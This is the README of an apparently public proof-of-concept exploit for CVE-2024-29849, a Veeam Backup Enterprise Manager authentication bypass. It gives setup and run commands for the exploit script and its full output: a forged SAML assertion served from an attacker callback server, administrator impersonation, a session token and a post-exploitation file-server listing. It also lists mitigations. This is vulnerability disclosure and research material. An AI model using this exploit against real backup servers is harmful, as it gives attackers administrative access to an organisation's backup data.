# CVE-2024-29849
Veeam Backup Enterprise Manager Authentication Bypass ([CVE-2024-29849](https://www.veeam.com/kb4581)) by [Sina Kheirkhah (@SinSinology)](https://twitter.com/SinSinology) of [SummoningTeam (@SummoningTeam)](https://twitter.com/summoningteam)

## Technical Analysis
[A root cause analysis of the vulnerability can be found on my blog
](https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
)
![poc](poc.gif)


## Summary
<p align="center">
  <img src="/poc.jpg" />
</p>

# Supported versions?

According to Veeam official advisory, all the versions BEFORE `Veeam Backup Enterprise Manager 12.1.2.172` are vulnerable

## Usage
First, you need to have the right setup for a local HTTPS setup, use the following commands
```plaintext
openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
```

```plaintext
python CVE-2024-29849.py --target https://192.168.253.180:9398/ --callback-server 192.168.253.1:443

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

        (*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/


(*) Target https://192.168.253.180:9398 is reachable and seems to be a Veeam Backup Enterprise Manager
(*) Fetching certificate for 192.168.253.180
(*) Common Name (CN) extracted from certificate: batserver.evilcorp.local
(*) Assumed domain name: evilcorp.local
(?) Is the assumed domain name correct(Y/n)?y
(*) Target domain name is: evilcorp.local
(*) Starting callback server

(^_^) Prepare for the Pwnage (^_^)

(*) Callback server listening on https://192.168.253.1:443
192.168.253.1 - - [10/Jun/2024 07:20:13] "GET / HTTP/1.1" 200 -
(*) Callback server 192.168.253.1:443 is reachable
(*) Triggering malicious SAML assertion to https://192.168.253.180:9398
(*) Impersonating user: administrator@evilcorp.local
192.168.253.180 - - [10/Jun/2024 07:20:13] "POST /ims/STSService HTTP/1.1" 200 -
(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType

(+) Exploit was Successful, authenticated as administrator@evilcorp.local
(*) Got token: MmIzOGVjMzQtZGIxZC00MWE3LTgxNjMtNjA2MTE4ODY5ZDkw
(*) Starting post-exploitation phase
(*) Retrieving the list of file servers
{'FileServers': [{'ServerType': 'SmbServer', 'HierarchyObjRef': 'urn:NasBackup:FileServer:9dee6394-bf7a-4dc6-a9a5-4faf2e22551d.0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'SmbServerOptions': {'Path': '\\\\192.168.253.134\\corporate-docs', 'CredentialsId': None}, 'NfsServerOptions': None, 'FileServerOptions': None, 'ProcessingOptions': {'ServerUid': 'urn:veeam:FileServer:0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'CacheRepositoryUid': 'urn:veeam:Repository:88788f9e-d8f5-4eb4-bc4f-9b3f5403bcec'}, 'NASServerAdvancedOptions': {'ProcessingMode': 'Direct', 'StorageSnapshotPath': None}, 'Name': '\\\\192.168.253.134\\corporate-docs', 'UID': 'urn:veeam:FileServer:0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'Links': [{'Rel': 'Up', 'Href': 'https://192.168.253.180:9398/api/backupServers/e59b6cc4-444e-4a2d-a986-3d4d0b8791de', 'Name': '192.168.253.134', 'Type': 'BackupServerReference'}, {'Rel': 'Alternate', 'Href': 'https://192.168.253.180:9398/api/nas/fileServers/0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'Name': '\\\\192.168.253.134\\corporate-docs', 'Type': 'FileServerReference'}], 'Href': 'https://192.168.253.180:9398/api/nas/fileServers/0d4a7862-82cb-4c93-a53b-e500d6cb9e35?format=Entity', 'Type': 'FileServer'}]}


```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Veeam Advisory
* https://www.veeam.com/kb4581

## Follow Us on Twitter for the latest security research:
*  [SinSinology](https://twitter.com/SinSinology)
*  [SummoningTeam](https://twitter.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
